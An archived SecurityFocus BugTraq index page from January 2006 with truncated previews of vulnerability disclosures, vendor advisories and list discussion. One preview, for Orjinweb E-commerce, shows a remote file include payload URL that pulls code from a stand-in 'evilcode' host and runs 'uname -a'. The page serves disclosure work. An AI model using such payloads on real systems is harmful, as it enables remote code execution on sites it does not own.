BugTraq Mode:
(Page 1228 of 1748)  < Prev  1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233  Next >
Re: Interview: Ilfak Guilfanov 2006-01-07
Denis Jedig (seclists syneticon de)
Randal L. Schwartz wrote:

> The "Security Now!" podcast interviewed Ilfak as well. For an audio interview
> and transcript, see episode #21 at <http://www.grc.com/securitynow.htm>.

Why the hell does Gibson get a Forum and a reference *on this list*?

http://www.grcsucks.com/

Denis Jedig
synetico

[ more ]  [ reply ]
industry standards - current status [was: what we REALLY learned from WMF] 2006-01-06
Gadi Evron (ge linuxbox org)

Comments and text below the quoted text.

> mis-information. I believe even *you* posted erroneous information. Nice.

#1.

> First everyone bitches about how bad Microsoft security is, how they
> don't "get it" and how they don't care. Then, when they issue a patch
> out-of-cycle, we hear pom

[ more ]  [ reply ]
Orjinweb E-commerce 2006-01-06
serxwebun linuxmail org
Orjinweb E-commerce

Remote File Include Vulnerability

http://www.targetsite.com/?page=http://evilcode.txt?&cmd=uname -a

[ more ]  [ reply ]
AIM Multiple Cross Site Scripting Vulnerability 2006-01-08
simo morx org
Title: AIM Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 26 December 2005
Published: 7 January 2006
MorX Security Research Team
http://www.morx.org

Service: Web

Vendor: AIM.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin atta

[ more ]  [ reply ]
Html_Injection in vBulletin 3.5.2 2006-01-08
the_bekir savsak com
Vulnerable Version: 3.5.2 (prior versions also may be affected) Bug: Html_Injection (Second order Cross_Site_Scripting) Exploitation: Remote with browser

Html_Injection : The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.

[ more ]  [ reply ]
MDKSA-2006:004 - Updated pdftohtml packages fix several vulnerabilities 2006-01-09
Mandriva Security Team (xsecurity mandriva com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:004
http://www.mandriva.com/security/
_____________________________________________________________________

[ more ]  [ reply ]
MDKSA-2006:008 - Updated koffice packages fix several vulnerabilities 2006-01-09
Mandriva Security Team (xsecurity mandriva com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:008
http://www.mandriva.com/security/
_____________________________________________________________________

[ more ]  [ reply ]
AOL Multiple Cross Site Scripting Vulnerability 2006-01-08
simo morx org
Title: AOL Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 26 December 2005
Published: 7 January 2006
MorX Security Research Team
http://www.morx.org

Service: Web

Vendor: AOL.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin atta

[ more ]  [ reply ]
Re: Did MS pull an Ilfak? (MS patch bindiff results) 2006-01-09
Brett Glass (brett lariat org)
Question: Is Ilfak's patch still needed for Windows 95, 98, SE and ME
systems, for which Microsoft is refusing to provide a patch? To what
extent are these systems vulnerable if not patched?

--Brett Glass

[ more ]  [ reply ]
iDefense Security Advisory 01.09.06: Multiple Vendor mod_auth_pgsql Format String Vulnerability 2006-01-09
labs-no-reply (at) idefense (dot) com [email concealed] (labs-no-reply idefense com)
Multiple Vendor mod_auth_pgsql Format String Vulnerability

iDefense Security Advisory 01.09.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=367
January 09, 2006

I. BACKGROUND

The mod_auth_pgsql apache module allows user authentication against
information stored in a Postgre

[ more ]  [ reply ]
[SECURITY] [DSA 932-1] New kpdf packages fix arbitrary code execution 2006-01-09
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 932-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
January 9th, 2006

[ more ]  [ reply ]
Digital Armaments Security Advisory 01.09.2006: Apache auth_ldap module Multiple Format Strings Vulnerability 2006-01-09
info digitalarmaments com
Digital Armaments advisory is 12.22.2005
http://www.digitalarmaments.com/2006090173928420.html

I. Background

auth_ldap is an LDAP authentication module for Apache, the world's most popular web server. auth_ldap has excellent performance, and supports Apache on both Unix and Windows NT. It also has

[ more ]  [ reply ]
[eVuln] Venom Board SQL Injection Vulnerability 2006-01-09
alex evuln com
New eVuln Advisory:
Venom Board SQL Injection Vulnerability

--------------------Summary----------------

Software: Venom Board
Sowtware's Web Site: http://sourceforge.net/projects/venomboard/
Versions: 1.22
Critical Level: Moderate
Type: Cross-Site Scripting
Class: Remote
Status: Unpatched
Exploit:

[ more ]  [ reply ]
[SECURITY] [DSA 931-1] New xpdf packages fix arbitrary code execution 2006-01-09
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 931-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
January 9th, 2006

[ more ]  [ reply ]
[eVuln] Foxrum BBCode XSS Vulnerabilty 2006-01-09
alex evuln com
New eVuln Advisory:
Foxrum BBCode XSS Vulnerabilty

--------------------Summary----------------

Software: Foxrum
Sowtware's Web Site: http://www.foxrum.fr.st/
Versions: 4.0.4f
Critical Level: Harmless
Type: Cross-Site Scripting
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available

[ more ]  [ reply ]
NetBSD Security Advisory 2006-002: settimeofday() time wrap 2006-01-09
NetBSD Security Officer (security-officer NetBSD org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NetBSD Security Advisory 2006-002
=================================

Topic: settimeofday() time wrap

Version: NetBSD-current: source prior to December 5, 2005
NetBSD 3.0: not affected
NetBSD 2.1: affected
NetBSD 2.0.3: affected
NetBSD

[ more ]  [ reply ]
NetBSD Security Advisory 2006-001: Kernfs kernel memory disclosure 2006-01-09
NetBSD Security Officer (security-officer NetBSD org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NetBSD Security Advisory 2006-001
=================================

Topic: Kernfs kernel memory disclosure

Version: NetBSD-current: source prior to November 23, 2005
NetBSD 3.0: not affected
NetBSD 2.1: affected
NetBSD 2.0.3: affected

[ more ]  [ reply ]
[SECURITY] [DSA 930-1] New smstools packages fix format string vulnerability 2006-01-09
Michael Stone (mstone klecker debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 930-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Steve Kemp
Jan 9, 2006

[ more ]  [ reply ]
[SECURITY] [DSA 929-1] New petris packages fix buffer overflow 2006-01-09
Michael Stone (mstone klecker debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 929-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Steve Kemp
Jan 9, 2006

[ more ]  [ reply ]
[UPDATE]Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities 2006-01-09
frankruder hotmail com
Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities

//this bug report is update for <<Microsoft Windows GRE WMF Format Multiple Memory Overrun Vulnerabilities>> by cocoruder 2006.01.07

by cocoruder
page:http://ruder.cdut.net
email:frankruder_at_hotmail.com

Last Up

[ more ]  [ reply ]
Microsoft Windows GRE WMF Format Multiple Memory Overrun Vulnerabilities 2006-01-07
frankruder hotmail com
Microsoft Windows GRE WMF Format Multiple Memory Overrun Vulnerabilities

by cocoruder
page:http://ruder.cdut.net
email:frankruder_at_hotmail.com

Last Update:2006.01.07
class:design error
Remote:yes
local:yes

Product Affected:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Ser

[ more ]  [ reply ]
xorg server 6.8.2 and below on 64bit arch 2006-01-08
serj varna net
This might be nothing or might be something comment please! My system is 64bit turion with 64 bit ubuntu on top. On this machine long = void* = 8 bytes. On a 32 bit arch long = void* = 4 bytes.
Great now lets have look on this.

typedef struct {
int type;
unsigned long serial;
Bool send_e

[ more ]  [ reply ]
Re: Interview: Ilfak Guilfanov 2006-01-07
merlyn stonehenge com (Randal L Schwartz)
>>>>> "Matthew" == Matthew Murphy <mattmurphy (at) kc.rr (dot) com [email concealed]> writes:

Matthew> The URL for that blog post is:
Matthew> http://blogs.securiteam.com/index.php/archives/176

The "Security Now!" podcast interviewed Ilfak as well. For an audio interview
and transcript, see episode #21 at <http://www.grc.com

[ more ]  [ reply ]
[eVuln] NavBoard BBcode XSS Vulnerability 2006-01-07
alex evuln com
New eVuln Advisory:
NavBoard BBcode XSS Vulnerability

--------------------Summary----------------
Vendor: NavBoard
Vendor's Web Site: http://navarone.f2o.org/
Software: NavBoard
Sowtware's Web Site: http://sourceforge.net/projects/navboard/
Versions: checked: V16 Stable(2.6.0) and V17beta2
Critical

[ more ]  [ reply ]
[ GLSA 200601-04 ] VMware Workstation: Vulnerability in NAT networking 2006-01-07
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200601-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
Re: [USN-237-1] nbd vulnerability 2006-01-06
Florian Weimer (fw deneb enyo de)
* Martin Pitt:

> CVE-2005-3354

This CVE ID is wrong. The correct one is CVE-2005-3534.

[ more ]  [ reply ]
Survey on Vuln Disclosure: Request for Participation 2006-01-06
Richard Forno (rforno infowarrior org)
(x-posted to Full-Disclosure and elsewhere)

Greetings --

As part of my doctoral studies, I am seeking community input regarding how
secrecy and openness can be balanced in the analysis and alerting of
security vulnerabilities to protect critical national infrastructures. To
answer this question, m

[ more ]  [ reply ]
Recon2006 - Call for papers 2006-01-06
Hugo Fortier (hfortier recon cx)
RECON 2006 - Call for papers - 06/01/06
Montreal, Quebec, Canada
16 - 18 June 2006

We are pleased to announce the second annual RECON conference, which
will take place in Montreal from the 16th to the 18th of June 2006.

We are looking for original technical presentations, in the fields o

[ more ]  [ reply ]
Re: MD:Pro - Malware Distribution Project 2006-01-06
Rembrandt (rembrandt jpberlin de)
> On 01 February 2006 Frame4 Security Systems will launch their Malware Distribution Project (MD:Pro) service, which will offer developers of security systems and anti-malware products a vast collection of downloadable malware from a secure and reliable source, exclusively for the purposes of analys

[ more ]  [ reply ]
MDKSA-2006:005 - Updated xpdf packages fix several vulnerabilities 2006-01-06
Mandriva Security Team (security mandriva com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:005
http://www.mandriva.com/security/
_____________________________________________________________________

[ more ]  [ reply ]
(Page 1228 of 1748)  < Prev  1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus